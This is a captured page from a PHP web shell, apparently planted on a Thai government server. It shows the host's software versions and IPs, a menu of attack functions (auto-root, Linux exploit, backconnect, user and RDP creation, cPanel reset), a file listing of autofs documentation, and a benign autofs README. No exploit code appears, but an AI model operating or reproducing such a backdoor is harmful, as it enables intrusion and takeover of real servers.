Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
autofs-5.0.5 /
[ HOME SHELL ]
Name
Size
Permission
Action
COPYING
17.58
KB
-rw-r--r--
COPYRIGHT
778
B
-rw-r--r--
CREDITS
319
B
-rw-r--r--
INSTALL
6.48
KB
-rw-r--r--
README
1.75
KB
-rw-r--r--
README.active-restart
4.79
KB
-rw-r--r--
README.amd-maps
4.09
KB
-rw-r--r--
README.autofs-schema
681
B
-rw-r--r--
README.changer
1.2
KB
-rw-r--r--
README.ncpfs
3.26
KB
-rw-r--r--
README.replicated-server
1.67
KB
-rw-r--r--
README.smbfs
547
B
-rw-r--r--
README.v5.release
2.89
KB
-rw-r--r--
autofs.schema
830
B
-rw-r--r--
autofs.schema.new
771
B
-rw-r--r--
autofs4-2.6.18-v5-update-20090...
109.89
KB
-rw-r--r--
autofs4-2.6.19-v5-update-20090...
103.75
KB
-rw-r--r--
autofs4-2.6.20-v5-update-20090...
102.72
KB
-rw-r--r--
autofs4-2.6.21-v5-update-20090...
101.85
KB
-rw-r--r--
autofs4-2.6.22-v5-update-20090...
101.83
KB
-rw-r--r--
autofs4-2.6.22.17-v5-update-20...
101.9
KB
-rw-r--r--
autofs4-2.6.23-v5-update-20090...
100.79
KB
-rw-r--r--
autofs4-2.6.24-v5-update-20090...
100.78
KB
-rw-r--r--
autofs4-2.6.24.4-v5-update-200...
100.43
KB
-rw-r--r--
autofs4-2.6.25-v5-update-20090...
100.97
KB
-rw-r--r--
autofs4-2.6.26-v5-update-20090...
100.73
KB
-rw-r--r--
autofs4-2.6.27-v5-update-20090...
60.28
KB
-rw-r--r--
autofs4-2.6.28-v5-update-20090...
28.46
KB
-rw-r--r--
autofs4-2.6.29-v5-update-20090...
7.03
KB
-rw-r--r--
ldap-automount-auto.direct
1.14
KB
-rw-r--r--
ldap-automount-auto.indirect
544
B
-rw-r--r--
ldap-automount-auto.master
348
B
-rw-r--r--
ldap-automount-rfc2307-bis-aut...
1.5
KB
-rw-r--r--
ldap-automount-rfc2307-bis-aut...
816
B
-rw-r--r--
ldap-automount-rfc2307-bis-aut...
482
B
-rw-r--r--
ldap-automount-rfc2307-bis-old...
570
B
-rw-r--r--
ldap-nis-auto.direct
1.33
KB
-rw-r--r--
ldap-nis-auto.indirect
654
B
-rw-r--r--
ldap-nis-auto.master
420
B
-rw-r--r--
util-linux-2.12a-flock.patch
641
B
-rw-r--r--
util-linux-2.12q-flock.patch
554
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.changer
Fri Jan 21 17:31:43 GMT 2000 Toby Jaffey <toby@earth.li> Added modules/mount_changer.c I have an NEC CD-ROM DRIVE:251, 4X CD-ROM changer w/4 slots, 128kB Cache. The drive can only mount one CD at a time. To change the CD in use you must unmount, swap slots (lots of ioctl() calls) and remount. Using autofs, this module allows the illusion that all CDs are mounted at any given time. Only when data is requested does the drive need to swap. Clearly, this is awful for simultaneous reads across many disks, but I use it to create mp3 playlists spanning multiple CDs. The code is mostly clean, but rather than adding a new "mediatype" to the config file, I set my drive up as fstype=changer. The assumption is made that all of the disks are of type iso9660. This is a bad thing, but it works for me. [hpa: I believe these problems are due to a design error. The changer should be a lookup type, rather than a filesystem (mount) type.] My /etc/auto.master says: /mnt/changer /etc/auto.misc My /etc/auto.misc says: 1 -fstype=changer :/dev/hdb 2 -fstype=changer :/dev/hdb 3 -fstype=changer :/dev/hdb 4 -fstype=changer :/dev/hdb
Close